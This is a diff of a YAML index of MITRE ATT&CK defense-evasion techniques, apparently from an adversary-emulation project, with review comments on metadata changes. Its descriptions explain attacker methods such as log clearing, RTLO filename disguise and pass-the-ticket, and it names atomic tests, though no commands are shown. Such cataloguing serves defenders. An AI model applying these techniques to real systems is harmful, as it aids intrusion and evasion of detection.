+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -12216,9 +12351,8 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
@@ -12274,7 +12408,7 @@ defense-evasion:
elevation_required: true
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -12289,6 +12423,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -12297,18 +12432,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -12340,9 +12475,6 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -12414,7 +12546,7 @@ defense-evasion:
elevation_required: true
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -12535,7 +12667,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -12609,7 +12740,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests:
- name: Clear Logs
@@ -12678,7 +12808,7 @@ defense-evasion:
elevation_required: true
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -12775,7 +12905,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests:
- name: Enable Local and Remote Symbolic Links via fsutil
@@ -12828,7 +12957,7 @@ defense-evasion:
elevation_required: true
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -12860,11 +12989,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -12905,11 +13033,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -12965,7 +13092,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests:
- name: Access Token Manipulation
@@ -12999,7 +13125,7 @@ defense-evasion:
name: powershell
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -13056,7 +13182,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -13092,7 +13217,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -13125,8 +13250,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests:
- name: Odbcconf.exe - Execute Arbitrary DLL
@@ -13192,7 +13315,7 @@ defense-evasion:
name: command_prompt
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -13254,10 +13377,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -13315,7 +13437,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -13357,7 +13478,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -13416,41 +13537,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
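Review bot: the block removed here (platforms, domains, markings, id, type, created, created_by_ref, external_references) is re-emitted by the next hunk under a different key order, so the only real deletions in this hunk are `spec_version` and the 2.1.0 `x_mitre_attack_spec_version`; when verifying, match the removed and re-added `external_references` entries by `source_name` rather than by position (the M-Trends URL changes from content.fireeye.com to the mandiant.com PDF, the other four entries are identical).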
@@ -13459,20 +13549,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
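Review bot: `x_mitre_permissions_required` (`User`) is dropped from T1578.003 here, but the same field survives on techniques in this diff that were not refreshed from upstream (`Administrator` on T1207, `User` on T1218.008), so the file now mixes objects with and without it; any code that reads required permissions should treat the field as optional, and the commit message should mention that it disappears from refreshed techniques. The added `x_mitre_contributors` entry and `revoked: false` are consistent with the bump to `x_mitre_version: '1.2'` and spec 3.2.0.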
@@ -13502,7 +13622,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -13537,8 +13657,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -13629,7 +13747,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests:
- name: Disable Powershell ETW Provider - Windows
@@ -13733,7 +13850,7 @@ defense-evasion:
elevation_required: true
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -13741,19 +13858,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
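Review bot: the rewritten description ends with a trailing space inside the double-quoted scalar (`... [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), which will round-trip into rendered output; if the generator copies upstream text verbatim this is an upstream artifact to leave alone, otherwise strip it. The new text also introduces two technique links (T1110, T1499) that whatever renders these descriptions must resolve, as it already does for the existing T1562/004 link.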
@@ -13762,7 +13885,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -13785,9 +13908,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -13820,7 +13942,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -13839,8 +13961,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -13871,7 +13991,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -13901,12 +14021,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -13932,9 +14050,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
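Review bot: the platform change for T1070 (`- - Office 365` and `- - Google Workspace` replaced by `+ - Office Suite`, with `x_mitre_version` going from 2.1 to 2.2) matches the consolidated Office Suite platform ATT&CK introduced, but any index file that is keyed by platform name (the Office 365 and Google Workspace per-platform indexes) will no longer match this technique unless it is regenerated in the same commit; please confirm those indexes were rebuilt from the same data.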
@@ -13965,9 +14082,8 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests:
- name: Indicator Removal using FSUtil
@@ -14014,7 +14130,7 @@ defense-evasion:
elevation_required: false
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -14034,6 +14150,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -14041,7 +14158,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -14057,34 +14173,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
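Review bot: the `external_references` block for T1550.003 is rewritten almost in full only because the entries come out in a different order (CERT-EU moves to the front, GentilKiwi and ADSecurity move after Campbell), while the single content change is the GentilKiwi entry now pointing at a Wayback snapshot (`+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos`) with the Retrieved date updated to September 12, 2024. Consider sorting references by `source_name` in the generator so future refreshes show only real content changes; as written, the reorder hides the one substantive edit.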
@@ -14251,7 +14368,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests:
- name: Creating W32Time similar named service using schtasks
@@ -14320,7 +14436,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -14369,8 +14485,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -14508,7 +14622,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -14529,7 +14643,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -14596,7 +14709,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests:
- name: Mount ISO image
@@ -14760,7 +14872,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -14781,8 +14893,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -14843,11 +14953,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
